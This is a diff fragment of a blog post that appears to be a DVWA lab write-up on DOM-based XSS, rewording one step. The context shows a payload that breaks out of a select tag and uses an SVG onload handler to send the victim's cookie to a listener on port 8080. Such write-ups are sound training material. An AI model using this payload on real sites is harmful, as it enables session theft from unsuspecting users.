CSpanias/cspanias.github.io/_posts/2023-12-16-DVWA - XSS (DOM).md

     ![](medium_payload.png)

-3. We can use the same process we used at the previous level to steal our target's cookie:
+3. We can use the same process as before to steal our target's cookie:

     ```javascript
     </select><svg/onload=window.location='http://127.0.0.1:8080/?cookie='+document.cookie>